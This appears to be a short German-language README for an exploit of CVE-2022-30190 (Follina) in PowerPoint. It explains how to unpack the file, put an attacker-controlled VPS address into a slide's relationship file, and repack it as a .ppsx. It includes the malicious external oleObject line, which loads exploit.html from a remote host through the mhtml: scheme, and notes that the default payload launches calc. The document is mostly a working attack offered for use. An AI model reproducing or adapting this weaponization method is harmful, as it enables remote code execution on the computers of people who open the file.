
Dies ist ein Exploit für CVE-2022-30190 in PowerPoint.
Dies ist ein Exploit für CVE-2022-30190 in PowerPoint.
Ändern Sie die Dateiendung in 'zip' und entpacken Sie die Datei. Sie können \ppt\slides\_rels\slide1.xml.rels bearbeiten und durch Ihre VPS-IP:Port ersetzen, wie folgt. Komprimieren Sie sie dann auf dieselbe Weise und ändern Sie die Endung in 'ppsx'. Das Standard-Payload in 'exploit.html' führt calc aus.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>